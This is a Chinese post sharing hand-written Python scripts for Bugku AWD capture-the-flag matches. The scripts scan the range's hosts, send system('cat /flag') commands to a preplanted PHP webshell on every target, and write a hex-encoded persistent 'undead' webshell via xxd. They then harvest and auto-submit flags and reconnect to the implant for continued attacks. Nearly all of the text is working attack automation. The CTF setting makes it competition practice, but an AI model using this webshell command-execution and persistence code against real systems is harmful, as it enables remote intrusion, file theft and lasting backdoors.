Bugku手写小脚本(大佬就不用看了,鄙人水平有限)
首先是检测网站存活脚本
import urllib.request
import time
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/49.0.2')]
for n in range(1,255):
nb = str(n)
target = 'http://192-168-1-'+nb+'.awd.bugku.cn/'
new = open('H:/Python3.0Work/AWD/bugkuwz.txt',mode='a+',encoding='utf-8')
new.write(target)
new.write('\n')
file = open('H:/Python3.0Work/AWD/bugkuwz.txt')
lines = file.readlines()
aa=[]
for line in lines:
temp=line.replace('\n','')
aa.append(temp)
print('存活网站如下:')
for a in aa:
tempUrl = a
try :
opener.open(tempUrl)
print(tempUrl)
except urllib.error.HTTPError:
# print(tempUrl+' 访问页面出错')
time.sleep(0.5)
except urllib.error.URLError:
# print(tempUrl+' 访问页面出错')
time.sleep(0.5)
time.sleep(0.1)
连接预设后门脚本进行一系列操作
from urllib import request
import re
import requests
#连接预留木马进行flag的获取
def getflag():
url = 'http://192-168-1-{}.awd.bugku.cn/a.php' #已知马填写
cmd = {'a' : "system('cat /flag')"} #参数填写
for i in range(1,255):
try:
r = requests.post(url.format(str(i)),data=cmd,timeout=2)
f=open('H:/Python3.0Work/AWD/flag.txt',mode='a+',encoding='utf-8')
f.write(r.text)
except:
pass
#连接预留木马进行内存马的注入
def Nodead():
url = 'http://192-168-1-{}.awd.bugku.cn/a.php' #已知马填写
cmd = {'a' : "system('echo (注意这里填写十六进制转码后的不死马)|xxd -r -ps > bsm.php')"} #参数[a] 进行写入不死马
for i in range(1,255):
try:
r = requests.post(url.format(str(i)),data=cmd,timeout=1)
print(r.url+'存在已知木马,已写入不死马请尽快执行不死马')
response = request.urlopen('http://192-168-1-'+str(i)+'.awd.bugku.cn/bsm.php',timeout=1)
res = response.read().decode('utf-8')
print (res)
except:
pass
#提交flag
def intoflag():
f=open('H:/Python3.0Work/AWD/flag.txt',mode='r+')
while 1:
flag = f.readline()
if not flag:
break
else:
F1 = re.sub('{','',flag)
F2 = re.sub('}','',F1)
F3 = re.sub('flag','',F2,1)
response = request.urlopen('https://ctf.bugku.com/pvp/submit.html?token=[ ]&flag='+F3+'',timeout=1)
res = response.read().decode('utf-8')
print (res)
f.close()
if __name__ =='__main__':
print('Loading......')
getflag()
intoflag()
Nodead()
print('AttackOver!')
持续攻击(连接不死马)
import requests
import re
from urllib import request
def getflag():
url = 'http://192-168-1-{}.awd.bugku.cn/.123.php' #填写不死马的位置
cmd = {'a' : "system('cat /flag')"}
for i in range(1,255):
try:
b = requests.post(url.format(str(i)),data=cmd,timeout=1)
f=open('H:/Python3.0Work/AWD/flag.txt',mode='a+',encoding='utf-8')
f.write(b.text)
f.close()
except:
pass
def intoflag():
f=open('H:/Python3.0Work/AWD/flag.txt',mode='r+')
while 1:
flag = f.readline()
if not flag:
break
else:
F1 = re.sub('{','',flag)
F2 = re.sub('}','',F1)
F3 = re.sub('flag','',F2,1)
response = request.urlopen('https://ctf.bugku.com/pvp/submit.html?token=[ ]&flag='+F3+'',timeout=1)
res = response.read().decode('utf-8')
print (res)
f.close()
if __name__ =='__main__':
print('后续攻击开始展开......')
getflag()
intoflag()
print('AttackOver!')